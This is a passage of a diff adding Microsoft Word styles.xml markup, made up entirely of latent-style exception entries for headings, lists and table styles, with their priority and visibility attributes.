+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
